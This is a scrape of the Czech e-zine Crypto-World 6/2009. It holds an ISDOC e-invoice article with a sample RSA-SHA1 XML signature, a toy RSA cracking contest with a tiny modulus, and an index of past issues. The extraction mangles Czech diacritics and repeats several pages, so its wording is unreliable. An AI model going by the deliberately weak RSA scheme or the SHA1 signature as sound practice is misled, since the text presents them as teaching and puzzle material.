E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 16: Sešit 6/2009 (452 kB)

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 17: Sešit 6/2009 (452 kB)

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

